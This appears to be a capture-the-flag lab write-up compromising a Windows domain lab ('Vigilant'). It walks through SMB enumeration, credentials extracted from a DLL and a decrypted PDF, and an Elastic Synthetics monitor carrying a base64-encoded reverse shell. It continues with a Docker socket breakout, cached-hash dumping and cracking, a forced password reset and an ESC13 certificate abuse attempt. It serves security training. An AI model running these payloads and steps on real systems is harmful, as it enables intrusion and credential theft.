Vigilant (Chain)
Operating System: Microsoft Windows Server 2022 Standard
Chain: True (2 Machines)
Credentials
Username
Password
Method
Scope
svc_auditreporter
DeVeLoPeR712
Extracted from .dll
Domain user
Pamela.Clark
Vigilant@Tech2024
Extracted from decrypted PDF
Domain user
Alex.Powell
Vigilant_Market2024
Extracted from decrypted PDF
Domain user
Edwin.Dixon
Vigilant_Finance$
Extracted from decrypted PDF
Domain user
Daniel.Washington
Vigilant&Strategy!
Extracted from decrypted PDF
Domain user
✅ Valid Usernames
Adrian.Hunter
Adrian.Ray
Albert.Shelton
Alexa.Chavez
Alex.Alexander
Alex.Bailey
Alex.Powell
Alyssa.Gonzalez
Amelia.Morales
Amy.Ross
Arlene.Fowler
Audrey.Austin
Avery.Sanchez
Bertha.Hopkins
Bessie.Fuller
Brandie.Mason
Brandon.Lambert
Brandy.Edwards
Byron.Gordon
Carole.Dean
Caroline.Chavez
Carter.Ruiz
Chad.Meyer
Charlene.Flores
Charlene.Jenkins
Cindy.Steeves
Clara.Carlson
Clarence.Dunn
Claude.Stone
Daniel.Washington
Dan.Wells
Deanna.Johnston
Denise.Grant
Dylan.Mason
Eduardo.Anderson
Eduardo.Burns
Edwin.Dixon
Erika.Armstrong
Ethan.Carter
Ethel.Armstrong
Everett.Morrison
Frances.Lewis
Gabriella.Morrison
Gabriel.Stewart
Heather.Green
Isobel.Martin
Ivan.Mendoza
Jerome.Perry
John.Chapman
Kristina.Perry
Lauren.Cooper
Leah.Sullivan
Leo.Mitchell
Leona.Adams
Lewis.Newman
Lily.Young
Marcia.Hudson
Nathan.Stanley
Nicole.Thompson
Pamela.Clark
Patrick.Hart
Paul.Brewer
Phyllis.Silva
Randy.Tucker
Rene.Chapman
Robin.Wagner
Rodney.Smith
Roland.Johnson
Scott.Rivera
Shannon.Simpson
Sophia.Kelley
Stacy.Richardson
svc_auditreporter
svc_elastic
svc_iis
Tiffany.Nelson
Timmothy.Bates
Tonya.Lynch
Travis.Willis
Tristan.Payne
Tyler.Holmes
Tyrone.Carroll
Veronica.Ruiz
Wesley.Rogers
William.Fernandez
🔑 Passwords list
Information Gathering
Nmap Scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5601/tcp open esmagent
9200/tcp open wap-wsp
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpService enumeration
vigilant.vl
DNS
Not vulnerable to DNS Zone transfer
SMB (enum4linux-ng)
Domain SID: S-1-5-21-2615182196-3196294898-3079774137
Root/parent domain
SMB signing: true (Not vulnerable to NTLM Relay attacks)
NetBIOS computer name: DC
NetBIOS domain name: VIGILANT
Domain: vigilant.vl
FQDN: DC.vigilant.vl
Server allows null session authentication
server allows guest session authentication (useful for enumeation)
HTTP: 5601
Elastic instance
10.10.145.214
HTTP:80
Compromise SRV
Initial Foothold on SRV
Discovering a sensitive files on SMB
❯ nxc smb vigilant.vl -u 'Intrusionz3r0' -p '' --shares -M spider_plus
❯ nxc smb vigilant.vl -u 'Intrusionz3r0' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True❯ tree /tmp/nxc_hosted/nxc_spider_plus/10.10.145.213
/tmp/nxc_hosted/nxc_spider_plus/10.10.145.213
└── ITShare
└── IT_Support
├── ADAudit
│ ├── ADAudit.dll
│ ├── ADAuditLib.dll
│ ├── ADAuditLib.pdb
│ ├── ADAudit.pdb
│ ├── ADAudit.runtimeconfig.json
│ ├── itext.bouncy-castle-connector.dll
│ ├── itext.pdfua.dll
│ ├── Microsoft.DotNet.PlatformAbstractions.dll
│ ├── Microsoft.Extensions.DependencyInjection.Abstractions.dll
│ ├── Microsoft.Extensions.Logging.dll
│ └── Microsoft.Extensions.Primitives.dll
└── ADAuditReports
└── Password_Strength_Report_encrypted.pdf
5 directories, 12 files
Valuable file: Password_Strength_Report_encrypted.pdf
Discovering a domain user credentials in the ADAudit.dll
During the enumeration the tester found ADAudit.dll which containing svc_auditreporter's plaintext credentials.
Credentials: svc_auditreporter : DeVeLoPeR712
Decrypting pdf
using System;
using System.IO;
class PDFDecryptTool
{
static void Main(string[] args)
{
Console.WriteLine("PDF Decryption Tool");
Console.WriteLine("-------------------\n");
if (args.Length == 0 || args[0] == "/?")
{
ShowHelp();
return;
}
try
{
string inputFile = args[0];
string outputFile = args.Length > 1 ? args[1] : GenerateOutputPath(inputFile);
Console.WriteLine($"Decrypting: {inputFile}");
DecryptFile(inputFile, outputFile);
Console.WriteLine($"Success!\nDecrypted file saved to: {outputFile}");
}
catch (Exception ex)
{
Console.WriteLine($"\nERROR: {ex.Message}");
}
}
static void ShowHelp()
{
Console.WriteLine("Usage:");
Console.WriteLine(" PDFDecryptTool.exe <encrypted_file> [output_file]");
Console.WriteLine("\nExamples:");
Console.WriteLine(" PDFDecryptTool.exe report_encrypted.pdf");
Console.WriteLine(" PDFDecryptTool.exe encrypted.pdf decrypted.pdf");
}
static void DecryptFile(string inputPath, string outputPath)
{
if (!File.Exists(inputPath))
throw new FileNotFoundException("Input file not found");
byte[] data = File.ReadAllBytes(inputPath);
byte[] key = GenerateKey(data.Length);
Unshuffle(ref data);
for (int i = 0; i < data.Length; i++)
{
data[i] = (byte)((data[i] << 4) | (data[i] >> 4));
data[i] ^= key[i % key.Length];
}
File.WriteAllBytes(outputPath, data);
}
static byte[] GenerateKey(int length)
{
byte[] key = new byte[length];
new Random(12345).NextBytes(key);
return key;
}
static void Unshuffle(ref byte[] data)
{
for (int i = 0; i < data.Length - 1; i += 2)
{
// Swap adjacent bytes
byte temp = data[i];
data[i] = data[i + 1];
data[i + 1] = temp;
}
}
static string GenerateOutputPath(string inputPath)
{
string dir = Path.GetDirectoryName(inputPath);
string name = Path.GetFileNameWithoutExtension(inputPath)
.Replace("_encrypted", "")
.Replace("_crypted", "");
string ext = Path.GetExtension(inputPath);
return Path.Combine(dir, $"{name}_decrypted{ext}");
}
}PS C:\Temp\>PDFDecryptTool.exe Password_Strength_Report_encrypted.pdf decrypted.pdf
PDF Decryption Tool
-------------------
Decrypting: Password_Strength_Report_encrypted.pdf
Success!
Decrypted file saved to: decrypted.pdf
FLARE-VM Sun 05/04/2025 2:06:44.41
Authenticating on Elastic
The tester authenticate on Elastic using Pamela.clark credentials
Discovering Pamela.clark is a superuser
Getting a reverse shell using
The tester configured a monitor in http://10.10.224.229:5601/app/synthetics/add-monitor
step('Trying to execute commands', async () => {
await page.goto('file:///etc/passwd');
});
Creating a synthetics project
❯ npm install -g @elastic/synthetics
❯ npx @elastic/synthetics init Abusing
Need to install the following packages:
@elastic/synthetics@1.18.0
Ok to proceed? (y) Y
> Initializing Synthetics project in 'Abusing'
✔ Enter Elastic Kibana URL or Cloud ID · http://10.10.224.229:5601/
✔ What is your API key · ************************************************************
✔ Select the locations where you want to run monitors · Marketing Page (private)
✔ Set default schedule in minutes for all monitors · 1
✔ Choose project id to logically group monitors · Abusing
✔ Choose the target Kibana space · default
> Setting up project using NPM...
Wrote to /home/Intrusionz3r0/Documents/Vulnlabs/Vigilant/Content/Abusing/package.json:
{
"name": "abusing",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [],
"author": "",
"license": "ISC"
}
> Installing @elastic/synthetics library...
added 142 packages, and audited 143 packages in 14s
29 packages are looking for funding
run `npm fund` for details
2 moderate severity vulnerabilities
Some issues need review, and may require choosing
a different dependency.
Run `npm audit` for details.
> Writing Abusing/synthetics.config.ts.
> Writing Abusing/journeys/advanced-example-helpers.ts.
> Writing Abusing/journeys/advanced-example.journey.ts.
> Writing Abusing/README.md.
> Writing Abusing/journeys/example.journey.ts.
> Writing Abusing/lightweight/heartbeat.yml.
> Writing Abusing/.github/workflows/run-synthetics.yml.
> Writing Abusing/package.json.
All set, you can run below commands inside: /home/Intrusionz3r0/Documents/Vulnlabs/Vigilant/Content/Abusing:
Run synthetic tests: npm run test
Push monitors to Kibana: SYNTHETICS_API_KEY=<value> npm run push
Configure API Key via `SYNTHETICS_API_KEY` env variable or --auth CLI flag.
Visit https://www.elastic.co/guide/en/observability/current/synthetic-run-tests.html to learn more.Creating a malicious monitor
The tester modified journeys/example.journey.ts as follows:
import { journey, step, monitor, expect } from '@elastic/synthetics';
journey('My Example Journey', ({ page, params }) => {
monitor.use({
id: 'example-monitor',
schedule: 1,
});
step('launch application', async () => {
await page.goto('http://localhost/');
const { execSync } = require('child_process');
execSync('echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguNS40OC8xMjM0IDA+JjE=" | base64 -d | bash', { stdio: 'inherit' });
});
step('assert title', async () => {
const header = await page.locator('h1');
expect(await header.textContent()).toBe('todos');
});
});
❯ SYNTHETICS_API_KEY=KEY npm run push
Compromise SRV via Docker Breakout
Discovering docker.sock was exposed
elastic-agent@srv:/opt$ find / -name "docker.sock" 2>/dev/null
/run/docker.sockEscaping to the container via Docker breakout using SOCK method
elastic-agent@srv:/dev/shm$ sh deepce.sh --exploit SOCK --command "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvNTU1NSAwPiYx|base64 -d|bash"
## .
## ## ## ==
## ## ## ## ===
/"""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ / ===- ~~~
\______ X __/
\ \ __/
\____\_______/
__
____/ /__ ___ ____ ________
/ __ / _ \/ _ \/ __ \/ ___/ _ \ ENUMERATE
/ /_/ / __/ __/ /_/ / (__/ __/ ESCALATE
\__,_/\___/\___/ .___/\___/\___/ ESCAPE
/_/
=====================================( Exploiting Sock )======================================
[+] Preparing Exploit
[+] Exploit Type ............. Custom Command
[+] Custom Command ........... echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvNTU1NSAwPiYx|base64 -d|bash
[+] Clean up ................. Automatic on container exit
[+] Creating container ..... 63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26
[+] If the shell dies you can restart your listener and run the start command to fire it again
Start Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/start
Logs Command: curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/logs?stderr=1&stdout=1" --output -
[+] Once complete remember to tidy up by stopping and removing your container with following commands
Stop Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/stop
Remove Command: curl -s -XDELETE --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26
[+] Starting container ..... Success
[+] Sleeping for ........... 2s
[+] Fetching logs .......... Success
[+] Exploit completed ..... :)
==============================================================================================
Compromising Domain Controller
Initial foothold on DC
Discovering cache credentials
root@srv:/dev/shm# ./linikatz.sh
_ _ _ _ _
| (_)_ __ (_) | ____ _| |_ ____
| | | '_ \| | |/ / _` | __|_ /
| | | | | | | < (_| | |_ / /
|_|_|_| |_|_|_|\_\__,_|\__/___|
=[ @timb_machine ]=
I: [freeipa-check] FreeIPA AD configuration
-rw-r--r-- 1 root root 2169 Jul 25 2022 /etc/pki/fwupd/GPG-KEY-Linux-Foundation-Firmware
-rw-r--r-- 1 root root 959 Jul 25 2022 /etc/pki/fwupd/GPG-KEY-Linux-Vendor-Firmware-Service
-rw-r--r-- 1 root root 1679 Jul 25 2022 /etc/pki/fwupd/LVFS-CA.pem
-rw-r--r-- 1 root root 959 Jul 25 2022 /etc/pki/fwupd-metadata/GPG-KEY-Linux-Vendor-Firmware-Service
-rw-r--r-- 1 root root 2169 Jul 25 2022 /etc/pki/fwupd-metadata/GPG-KEY-Linux-Foundation-Metadata
-rw-r--r-- 1 root root 1679 Jul 25 2022 /etc/pki/fwupd-metadata/LVFS-CA.pem
I: [sss-check] SSS AD configuration
-rw-rw-r-- 1 root root 11567160 May 5 23:20 /var/lib/sss/mc/initgroups
-rw-rw-r-- 1 root root 9253600 May 5 23:20 /var/lib/sss/mc/passwd
-rw-rw-r-- 1 root root 6940392 May 5 23:20 /var/lib/sss/mc/group
-rw-r--r-- 1 root root 22 Mar 24 2024 /var/lib/sss/gpo_cache/vigilant.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
-rw-r--r-- 1 root root 1098 Mar 24 2024 '/var/lib/sss/gpo_cache/vigilant.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf'
-rw------- 1 root root 1286144 Mar 1 2024 /var/lib/sss/db/sssd.ldb
-rw------- 1 root root 2581 May 6 03:25 /var/lib/sss/db/ccache_VIGILANT.VL
-rw------- 1 root root 1286144 May 5 23:20 /var/lib/sss/db/config.ldb
-rw------- 1 root root 1609728 May 6 03:25 /var/lib/sss/db/timestamps_vigilant.vl.ldb
-rw------- 1 root root 2015232 May 6 03:35 /var/lib/sss/db/cache_vigilant.vl.ldb
-rw-r--r-- 1 root root 113 May 5 23:20 /var/lib/sss/pubconf/krb5.include.d/localauth_plugin
-rw-r--r-- 1 root root 15 May 5 23:20 /var/lib/sss/pubconf/krb5.include.d/domain_realm_vigilant_vl
-rw-r--r-- 1 root root 40 May 5 23:20 /var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
-rw-r--r-- 1 root root 14 May 6 03:25 /var/lib/sss/pubconf/kdcinfo.VIGILANT.VL
-rw------- 1 root root 615 Mar 24 2024 /etc/sssd/sssd.conf
I: [vintella-check] VAS AD configuration
I: [pbis-check] PBIS AD configuration
I: [samba-check] Samba configuration
-rw------- 1 root root 421888 Feb 27 2024 /var/lib/samba/account_policy.tdb
-rw------- 1 root root 421888 Feb 27 2024 /var/lib/samba/share_info.tdb
-rw------- 1 root root 696 Feb 27 2024 /var/lib/samba/group_mapping.tdb
-rw------- 1 root root 421888 Feb 27 2024 /var/lib/samba/private/passdb.tdb
-rw------- 1 root root 430080 Mar 24 2024 /var/lib/samba/private/secrets.tdb
-rw------- 1 root root 8888 May 5 23:20 /var/lib/samba/private/netlogon_creds_cli.tdb
-rw------- 1 root root 528384 Feb 27 2024 /var/lib/samba/registry.tdb
-rw------- 1 root root 32768 May 5 23:20 /var/lib/samba/winbindd_cache.tdb
-rw------- 1 root root 28672 Feb 27 2024 /var/cache/samba/printing/printers.tdb
-rw------- 1 root root 696 Feb 27 2024 /var/cache/samba/netsamlogon_cache.tdb
-rw-r--r-- 1 root root 234 Mar 24 2024 /var/cache/samba/browse.dat
-rw-r--r-- 1 root root 8950 Feb 27 2024 /etc/samba/smb.conf
-rw-r--r-- 1 root root 8 Oct 4 2023 /etc/samba/gdbcommands
I: [kerberos-check] Kerberos configuration
-rw-r--r-- 1 root root 488 May 5 23:20 /etc/krb5.conf
-rw------- 1 root root 1280 May 5 23:24 /etc/krb5.keytab
I: [samba-check] Samba machine secrets
I: [samba-check] Samba hashes
I: [check] Cached hashes
I: [sss-check] SSS hashes
$6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0\00cachedPasswordType\00\01\00\00\00\01\00\00\001
I: [check] Machine Kerberos tickets
I: [sss-check] SSS ticket list
Ticket cache: FILE:/var/lib/sss/db/ccache_VIGILANT.VL
Default principal: SRV$@VIGILANT.VL
Valid starting Expires Service principal
05/06/2025 03:25:58 05/06/2025 13:25:58 krbtgt/VIGILANT.VL@VIGILANT.VL
renew until 05/07/2025 03:25:58, Flags: RIA
Etype (skey, tkt): aes256-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96 , AD types:
05/06/2025 03:25:58 05/06/2025 13:25:58 ldap/dc.vigilant.vl@VIGILANT.VL
renew until 05/07/2025 03:25:58, Flags: RAO
Etype (skey, tkt): aes256-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96 , AD types:
<SNIF>
root@srv:/dev/shm# Hash found: $6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0
Cracking hash discovered hash
❯ hashcat -m 1800 cached.hash /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0:&7Ujm*8Ik,(9Changing Gabriel.Steward's password
❯ nxc smb vigilant.vl -u users.txt -p '&7Ujm*8Ik,(9' --continue-on-success
<SNIF>
SMB 10.10.224.229 445 DC [-] vigilant.vl\Gabriel.Stewart:&7Ujm*8Ik,(9 STATUS_PASSWORD_EXPIRED ❯ impacket-changepasswd "vigilant.vl/Gabriel.Stewart:&7Ujm*8Ik,(9"@10.10.224.229 -newpass 'Password123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of vigilant.vl\Gabriel.Stewart
[*] Connecting to DCE/RPC as vigilant.vl\Gabriel.Stewart
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.Compromise domain controller via ESC13
Discovering a vulnerable template to ESC13
Certificate Templates
0
Template Name : VigilantAdmins
Display Name : Vigilant Admins
Certificate Authorities : vigilant-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
Private Key Flag : 33685504
Extended Key Usage : Smart Card Logon
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 200 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : VIGILANT.VL\Gabriel Stewart
VIGILANT.VL\Domain Admins
VIGILANT.VL\Enterprise Admins
Object Control Permissions
Owner : VIGILANT.VL\Administrator
Write Owner Principals : VIGILANT.VL\Domain Admins
VIGILANT.VL\Enterprise Admins
VIGILANT.VL\Administrator
Write Dacl Principals : VIGILANT.VL\Domain Admins
VIGILANT.VL\Enterprise Admins
VIGILANT.VL\Administrator
Write Property Principals : VIGILANT.VL\Domain Admins
VIGILANT.VL\Enterprise Admins
VIGILANT.VL\AdministratorRequirements
The certificate template specifies an issuance policy (
msPKI-Certificate-Policy)
#Retrieving certificate template and including its configured certificate issuance policies
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADObject -Filter {Name -eq "VigilantAdmins"} -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=VIGILANT,DC=VL" -Properties msPKI-Certificate-Policy
DistinguishedName : CN=VigilantAdmins,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=vigilant,DC=vl
msPKI-Certificate-Policy : {1.3.6.1.4.1.45844.1337.1}
Name : VigilantAdmins
ObjectClass : pKICertificateTemplate
ObjectGUID : e0821ebc-f1e7-4c66-b952-d308fbf3e80eThat issuance policy is linked to a privileged group (
msDS-OIDToGroupLink)
#Searching for certificate issuance policies that are linked to Active Directory groups via the msDS-OIDToGroupLink attribute
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADObject -LDAPFilter "(msDS-OIDToGroupLink=*)" -SearchBase "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=VIGILANT,DC=VL" -Properties msDS-OIDToGroupLink | Format-List Name, msDS-OIDToGroupLink
Name : 1.C4C92D522EAEB67B6205C6169671A0CE
msDS-OIDToGroupLink : CN=Temporary Admins,OU=VIGILANT,DC=vigilant,DC=vlThe linked group meets two conditions:
It is empty (no members)
It has universal scope (i.e., forest-wide group like
Enterprise Admins,Schema Admins, or any custom universal group)
#Listing the current members of the "Temporary Admins"
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADGroupMember -Identity "Temporary Admins"
#EMPTY
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> 
The certificate template allows
Client Authentication
Certificate Templates
0
Template Name : VigilantAdmins
Display Name : Vigilant Admins
Certificate Authorities : vigilant-CA
Enabled : True
Client Authentication : True🎉 The compromised user/computer can enroll in the certificate template.
Abusing ESC13 using Certipy
Unfortunately the machine is broken and Cannot continue due the KDC CA cert has expired.
❯ certipy-ad req -u 'gabriel.stewart' -p 'Password123!' -ca vigilant-CA -target DC.vigilant.vl -template 'VigilantAdmins' -dc-ip 10.10.183.85 -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Gabriel.Stewart@vigilant.vl'
[*] Certificate object SID is 'S-1-5-21-2615182196-3196294898-3079774137-1334'
[*] Saved certificate and private key to 'gabriel.stewart.pfx'❯ certipy-ad auth -pfx gabriel.stewart.pfx -dc-ip 10.10.183.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: gabriel.stewart@vigilant.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)Last updated